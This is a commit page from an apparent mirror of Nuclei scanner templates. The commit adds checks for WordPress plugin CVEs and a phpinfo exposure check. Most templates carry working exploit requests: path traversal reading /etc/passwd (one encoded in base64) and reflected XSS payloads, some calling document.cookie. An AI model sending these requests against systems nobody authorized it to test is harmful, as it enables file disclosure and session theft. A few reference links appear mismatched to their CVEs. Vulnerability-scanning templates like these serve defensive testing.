daffainfo
/
my-nuclei-templates
mirror of https://github.com/daffainfo/my-nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding some new templates

main
daffainfo 2021-07-16 08:28:45 +07:00
parent af886c4d8d
commit 80c791830b
33 changed files with 707 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
CVE-2011-1669.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-1669
info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

3
CVE-2011-4618.yaml
View File

@ -4,6 +4,7 @@ info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2011-4624.yaml
View File

@ -4,6 +4,7 @@ info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2011-4926.yaml
View File

@ -4,6 +4,7 @@ info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
CVE-2011-5106.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

3
CVE-2011-5107.yaml
View File

@ -4,6 +4,7 @@ info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2011-5179.yaml
View File

@ -4,6 +4,7 @@ info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

5
CVE-2011-5181.yaml
View File

@ -1,9 +1,10 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2011-5265.yaml
View File

@ -4,6 +4,7 @@ info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2012-0901.yaml
View File

@ -4,6 +4,7 @@ info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

3
CVE-2012-2371.yaml
View File

@ -4,6 +4,7 @@ info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
CVE-2012-4273.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2012-4768.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

3
CVE-2012-5913.yaml
View File

@ -4,6 +4,7 @@ info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
@ -26,4 +27,4 @@ requests:
- type: status
status:
- 200
- 200

30
CVE-2013-4117.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2013-4625.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2014-4513.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

25
CVE-2015-1000012.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2015-1000012
info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference: |
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

25
CVE-2015-9480.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2015-9480
info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo
severity: high
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

25
CVE-2016-10956.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2016-10956
info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
tags: cve,cve2016,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

30
CVE-2019-19134.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2019-19134
info:
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'foo"><svg//onload="alert(123)">'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
CVE-2019-9618.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
CVE-2020-12054.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-12054
info:
name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2020-17362.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-17362
info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2021-24298.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24298
info:
name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2021-24320.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24320
info:
name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=(alert)(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2021-24335.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24335
info:
name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2021-24389.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24389
info:
name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>prompt(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

47
phpinfo.yaml Normal file
View File

@ -0,0 +1,47 @@
id: phpinfo-files
info:
name: phpinfo Disclosure
author: pdteam,daffainfo,meme-lord
severity: low
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/php.php"
- "{{BaseURL}}/phpinfo.php"
- "{{BaseURL}}/info.php"
- "{{BaseURL}}/infophp.php"
- "{{BaseURL}}/php_info.php"
- "{{BaseURL}}/test.php"
- "{{BaseURL}}/i.php"
- "{{BaseURL}}/asdf.php"
- "{{BaseURL}}/pinfo.php"
- "{{BaseURL}}/phpversion.php"
- "{{BaseURL}}/time.php"
- "{{BaseURL}}/index.php"
- "{{BaseURL}}/temp.php"
- "{{BaseURL}}/old_phpinfo.php"
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

30
wp-custom-tables-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: wp-custom-tables-xss
info:
name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
reference: https://www.securityfocus.com/bid/54326/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-flagem-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-flagem-xss
info:
name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/38674
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-nextgen-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-nextgen-xss
info:
name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/57200/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

32
wp-slideshow-xss.yaml Normal file
View File

@ -0,0 +1,32 @@
id: wp-slideshow-xss
info:
name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/37948
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200